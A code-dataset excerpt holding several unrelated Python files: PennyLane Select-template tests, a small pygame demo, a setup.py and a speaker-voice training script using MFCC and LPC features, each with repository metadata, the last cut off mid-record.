test_control_in_ops(self, ops, control, msg_match):\n \"\"\"Test an error is raised when a control wire is in one of the ops\"\"\"\n with pytest.raises(ValueError, match=msg_match):\n qml.Select(ops, control)\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"msg_match\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0), qml.PauliZ(wires=0)],\n [1],\n r\"Not enough control wires \\(1\\) for the desired number of operations \\(3\\). At least 2 control wires required.\",\n ),\n (\n [qml.PauliX(wires=0)] * 10,\n [1, 2, 3],\n r\"Not enough control wires \\(3\\) for the desired number of operations \\(10\\). At least 4 control wires required.\",\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.PauliY(wires=\"b\"), qml.PauliZ(wires=\"c\")],\n [1],\n r\"Not enough control wires \\(1\\) for the desired number of operations \\(3\\). At least 2 control wires required.\",\n ),\n ],\n )\n def test_too_many_ops(self, ops, control, msg_match):\n \"\"\"Test that error is raised if more ops are requested than can fit in control wires\"\"\"\n with pytest.raises(ValueError, match=msg_match):\n qml.Select(ops, control)\n\n\ndef select_rx_circuit(angles):\n \"\"\"Circuit that uses Select for tests.\"\"\"\n qml.Select([qml.RX(angles[0], wires=[1]), qml.RY(angles[1], wires=[1])], control=0)\n return qml.expval(qml.PauliZ(wires=1))\n\n\ndef manual_rx_circuit(angles):\n \"\"\"Circuit that manually creates Select for tests.\"\"\"\n qml.ctrl(qml.RX(angles[0], wires=[1]), control=0, control_values=0)\n qml.ctrl(qml.RY(angles[1], wires=[1]), control=0)\n return qml.expval(qml.PauliZ(wires=1))\n\n\nclass TestInterfaces:\n \"\"\"Tests that the template is compatible with all interfaces, including the computation\n of gradients.\"\"\"\n\n @pytest.mark.autograd\n def test_autograd(self):\n \"\"\"Tests the autograd interface.\"\"\"\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_select = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_grad = pnp.array(input_default, requires_grad=True)\n\n grad_fn = qml.grad(circuit_default)\n grads = grad_fn(input_grad)\n\n grad_fn2 = qml.grad(circuit_select)\n grads2 = grad_fn2(input_grad)\n\n assert qml.math.allclose(grads, grads2)\n\n @pytest.mark.autograd\n def test_autograd_parameter_shift(self):\n \"\"\"Tests the autograd interface using the parameter-shift method.\"\"\"\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev, diff_method=\"parameter-shift\")\n circuit_select = qml.QNode(select_rx_circuit, dev, diff_method=\"parameter-shift\")\n\n input_default = [0.5, 0.2]\n input_grad = pnp.array(input_default, requires_grad=True)\n\n grad_fn = qml.grad(circuit_default)\n grads = grad_fn(input_grad)\n\n grad_fn2 = qml.grad(circuit_select)\n grads2 = grad_fn2(input_grad)\n\n assert qml.math.allclose(grads, grads2)\n\n @pytest.mark.tf\n def test_tf(self):\n \"\"\"Tests the tf interface.\"\"\"\n import tensorflow as tf\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_tf = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_tf = tf.Variable(input_default)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_tf)(input_tf)\n )\n assert qml.math.get_interface(qml.matrix(circuit_tf)(input_tf)) == \"tensorflow\"\n\n with tf.GradientTape() as tape:\n res = circuit_default(input_tf)\n grads = tape.gradient(res, [input_tf])\n\n with tf.GradientTape() as tape2:\n res2 = circuit_tf(input_tf)\n grads2 = tape2.gradient(res2, [input_tf])\n\n assert qml.math.allclose(grads[0], grads2[0])\n\n @pytest.mark.torch\n def test_torch(self):\n \"\"\"Tests the torch interface.\"\"\"\n import torch\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_torch = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_torch = torch.tensor(input_default, requires_grad=True)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_torch)(input_torch)\n )\n assert qml.math.get_interface(qml.matrix(circuit_torch)(input_torch)) == \"torch\"\n\n res = circuit_default(input_torch)\n res.backward()\n grads = [input_torch.grad]\n\n res2 = circuit_torch(input_torch)\n res2.backward()\n grads2 = [input_torch.grad]\n\n assert qml.math.allclose(grads[0], grads2[0])\n\n @pytest.mark.jax\n @pytest.mark.slow\n def test_jax(self):\n \"\"\"Tests the jax interface.\"\"\"\n import jax\n import jax.numpy as jnp\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n input_default = [0.5, 0.2]\n input_jax = jnp.array(input_default)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_jax = qml.QNode(select_rx_circuit, dev)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_jax)(input_jax)\n )\n assert qml.math.get_interface(qml.matrix(circuit_jax)(input_jax)) == \"jax\"\n\n grad_fn = jax.grad(circuit_default)\n grads = grad_fn(input_jax)\n\n grad_fn2 = jax.grad(circuit_jax)\n grads2 = grad_fn2(input_jax)\n\n assert qml.math.allclose(grads, grads2)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/templates/test_subroutines/test_select.py", "file_name": "test_select.py", "file_ext": "py", "file_size_in_byte": 13964, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.device", "line_number": 59, "usage_type": "call"}, {"api_name": "pennylane.Hadamard", "line_number": 64, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 66, "usage_type": "call"}, {"api_name": "pennylane.state", "line_number": 67, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 61, "usage_type": "call"}, {"api_name": "pennylane.Hadamard", "line_number": 72, "usage_type": "call"}, {"api_name": "pennylane.apply", "line_number": 74, "usage_type": "call"}, {"api_name": "pennylane.state", "line_number": 75, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 77, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 11, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 18, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 18, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 19, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 19, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 27, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 27, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 28, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 28, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 34, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 35, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 36, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 37, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 41, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 41, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 42, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 42, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 47, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 47, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 50, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 50, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 51, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 51, "usage_type": "call"}, {"api_name": "pennylane.tape.OperationRecorder", "line_number": 117, "usage_type": "call"}, {"api_name": "pennylane.tape", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pennylane.Select", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 83, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 83, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 86, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 86, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 87, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 87, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 91, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 91, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 95, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 95, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 100, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 101, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 102, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 103, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 107, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 107, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 108, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 108, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 109, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 109, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 163, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 167, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 169, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 132, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 132, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 137, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 137, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 140, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 140, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 141, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 141, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 146, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 147, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 148, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 149, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 153, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 153, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 154, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 154, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 155, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 155, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 156, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 156, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.SWAP", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 176, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 182, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 187, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.SWAP", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 196, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 199, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 227, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 228, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 205, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 214, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 219, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 252, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 230, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 230, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 239, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 259, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 259, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 265, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 265, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 266, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 266, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 276, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 278, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 279, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 282, "usage_type": "name"}, {"api_name": "pennylane.grad", "line_number": 284, "usage_type": "call"}, {"api_name": "pennylane.grad", "line_number": 287, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 290, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 290, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 273, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 297, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 301, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 301, "usage_type": "name"}, {"api_name": "pennylane.grad", "line_number": 303, "usage_type": "call"}, {"api_name": "pennylane.grad", "line_number": 306, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 309, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 316, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 318, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 319, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 322, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 324, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 324, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 325, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 327, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 327, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 327, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 329, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 333, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 337, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 337, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 344, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 346, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 350, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 352, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 353, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 355, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 355, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 355, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 365, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 365, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 339, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 374, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 377, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 377, "usage_type": "name"}, {"api_name": "pennylane.QNode", "line_number": 379, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 380, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 382, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 382, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 383, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 385, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 385, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 385, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 387, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 390, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 393, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 393, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 367, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 368, "usage_type": "attribute"}]} +{"seq_id": "37831128421", "text": "import pygame\n\n\n# constants\nBG_COLOR = 'antiquewhite2'\nCOLOR_PALETTE = {\n 0: (244, 105, 251),\n 1: (105, 184, 251)\n}\nSCR_SIZE = (480, 270)\n\n\nclass SharedVars:\n def __init__(self):\n self.game_over = False\n self.av_y_speed = 0\n self.curr_color_code = 0\n\n\ndef event_handling(ev_queue, state):\n for ev in ev_queue:\n if ev.type == pygame.QUIT:\n state.game_over = True\n\n elif ev.type == pygame.KEYDOWN:\n if ev.key == pygame.K_ESCAPE:\n state.game_over = True\n elif ev.key == pygame.K_SPACE:\n state.curr_color_code = (state.curr_color_code + 1) % 2\n elif ev.key == pygame.K_UP:\n state.av_y_speed = -1\n elif ev.key == pygame.K_DOWN:\n state.av_y_speed = 1\n\n elif ev.type == pygame.KEYUP:\n prkeys = pygame.key.get_pressed()\n if (not prkeys[pygame.K_UP]) and (not prkeys[pygame.K_DOWN]):\n state.av_y_speed = 0\n\n\ndef play_game():\n av_pos = [240, 135]\n game_st = SharedVars()\n screen = pygame.display.set_mode(SCR_SIZE)\n clock = pygame.time.Clock()\n\n while not game_st.game_over:\n event_handling(pygame.event.get(), game_st)\n\n av_pos[1] = (av_pos[1] + game_st.av_y_speed) % SCR_SIZE[1]\n\n screen.fill(BG_COLOR)\n pl_color = COLOR_PALETTE[game_st.curr_color_code]\n pygame.draw.circle(screen, pl_color, av_pos, 15, 0)\n pygame.display.update()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n print(\"Demo A | controls:\")\n print(\"UP/DOWN arrow, SPACE, ESCAPE\")\n pygame.init()\n pygame.display.set_caption('demo-a uses pygame only')\n play_game()\n pygame.quit()\n print('bye.')\n", "repo_name": "gaudiatech/pyved-engine", "sub_path": "examples_basic/demo-a-pygame.py", "file_name": "demo-a-pygame.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.QUIT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "74110141606", "text": "from setuptools import setup, find_packages\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# read the contents of your README file\nfrom pathlib import Path\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n name='genopyc',\n packages=find_packages(),\n version='2.0.9',\n long_description=long_description,\n include_package_data=True,\n package_data={'genopyc': ['data/*']},\n install_requires=['requests','pandas','numpy','networkx','igraph','biomapy','dash','dash_cytoscape','gprofiler_official'],\n long_description_content_type='text/markdown',\n author='Francesco Gualdi',\n license='GPL'\n)\n", "repo_name": "freh-g/genopyc", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "15934996477", "text": "\nfrom __future__ import division\n\nimport numpy as np\nfrom mel_coefficients import mfcc\nimport matplotlib.pyplot as plt\nfrom LBG import lbg\nfrom scipy.io.wavfile import read\nimport os\nfrom LPC import lpc\nimport wave\nimport struct\n\n\nimport sounddevice as sd\n\ndef wav_to_floats(wave_file):\n w = wave.open(wave_file)\n astr = w.readframes(w.getnframes())\n # convert binary chunks to short\n a = struct.unpack(\"%ih\" % (w.getnframes()* w.getnchannels()), astr)\n a = [float(val) / pow(2, 15) for val in a]\n return a\n\n\n\n\ndef training(nfiltbank, orderLPC):\n nSpeaker = 2\n nCentroid = 16\n codebooks_mfcc = np.empty((nSpeaker,nfiltbank,nCentroid))\n codebooks_lpc = np.empty((nSpeaker, orderLPC, nCentroid))\n directory = os.getcwd() + '/train';\n fname = str()\n\n for i in range(nSpeaker):\n fname = '/speaker' + str(i+1) + '.wav'\n print('Now speaker ', str(i+1), 'features are being trained' )\n (fs,s) = read(directory + fname)\n # read the wav file specified as first command line arg\n s = wav_to_floats(directory + fname)\n s = s[:48000]\n sd.play(s, fs)\n mel_coeff = mfcc(s, fs, nfiltbank)\n lpc_coeff = lpc(s, fs, orderLPC)\n codebooks_mfcc[i,:,:] = lbg(mel_coeff, nCentroid)\n codebooks_lpc[i,:,:] = lbg(lpc_coeff, nCentroid)\n \n\n codebooks = np.empty((2, nfiltbank, nCentroid))\n mel_coeff = np.empty((2, nfiltbank, 68))\n \n for i in range(2):\n fname = '/speaker' + str(i+1) + '.wav'\n (fs,s) = read(directory + fname)\n s = s[:48000]\n mel_coeff[i,:,:] = mfcc(s, fs, nfiltbank)[:,0:68]\n codebooks[i,:,:] = lbg(mel_coeff[i,:,:], nCentroid)\n \n \n plt.figure(nSpeaker + 1)\n s1 = plt.scatter(mel_coeff[0,6,:], mel_coeff[0,4,:],s = 100, color = 'r', marker = 'o')\n c1 = plt.scatter(codebooks[0,6,:], codebooks[0,4,:], s = 100, color = 'r', marker = '+')\n s2 = plt.scatter(mel_coeff[1,6,:], mel_coeff[1,4,:],s = 100, color = 'b', marker = 'o')\n c2 = plt.scatter(codebooks[1,6,:], codebooks[1,4,:], s = 100, color = 'b', marker = '+')\n plt.grid()\n plt.legend((s1, s2, c1, c2), ('Child','Parent','Child centroids', 'Parent centroids'), scatterpoints = 1, loc = 'upper left')\n plt.show()\n \n \n return (codebooks_mfcc, codebooks_lpc)\n \n \n", "repo_name": "tej6666/coding-challenge", "sub_path": "Child_Voice_Prediciton/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "wave.open", "line_number": 18, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 39, "usage_type": "call"}, {"api_name": "sounddevice.play", "line_number": 43, "usage_type": "call"}, {"api_name": "mel_coefficients.mfcc", "line_number": 44, "usage_type": "call"}, {"api_name": "LPC.lpc", "line_number": 45, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 46, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 55, "usage_type": "call"}, {"api_name": "mel_coefficients.mfcc", "line_number": 57, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, 